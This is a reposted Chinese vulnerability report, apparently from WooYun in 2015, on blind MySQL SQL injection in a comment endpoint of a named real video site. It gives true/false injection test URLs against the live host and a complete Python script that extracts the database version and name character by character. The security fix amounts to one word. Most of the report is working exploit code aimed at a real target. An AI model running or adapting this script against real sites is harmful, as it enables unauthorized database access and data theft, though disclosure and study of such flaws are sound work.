记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

华数TV某分站mysql盲注<附验证脚本>

2015-04-24 04:40

1=1:返回评论数据

code 区域
http://uc.wasu.cn/member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/if(1=1,55728,0)

可以看到有评论数据返回,与http://uc.wasu.cn/member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/55728 返回的一致.

1.png

code 区域
http://uc.wasu.cn/member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/if(1=2,55728,0)



1=2:空白没有数据.

注入点不能有空格、小于符号。

可以进行盲注.

漏洞证明:

code 区域
#coding=utf-8

import sys,urllib2

from optparse import OptionParser

from urllib2 import Request,urlopen,URLError,HTTPError

import urllib

result=''



def request(URL):

user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }

req = urllib2.Request(URL, None, user_agent)



try:

request = urllib2.urlopen(req)



except HTTPError, e:

if e.code == 500:

return 'Runtime Error'



except URLError, e:

print('[!] We failed to reach a server.')

print('[!] Reason: ' + str(e.reason))

sys.exit(1)



return request.read()





def binary_sqli(left, right, index):

global result

while 1:

mid = (left + right)

if mid%2:

mid = mid/2 + 1

else:

mid = mid/2

if mid == right:

sys.stdout.write(chr(mid))

break

payload = "if(ascii(substring(concat(@@version,0x3a,database()),%s,1))>%s,55728,0)" % (index, mid)

html = request('http://uc.wasu.cn/member/index.php/Comment/commentList/page_limit/10/show_style/mobile/type/video/relier/'+payload)

verify = 'Woman8394'

if verify in html:

left = mid

else:

right = mid



if __name__ == '__main__':

print 'concat(@@version,0x3a,database(): ',

for i in range(1,150):

binary_sqli(32, 127, i)



wasu.png

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0108829

阅读:96421 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“华数TV某分站mysql盲注<附验证脚本>”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云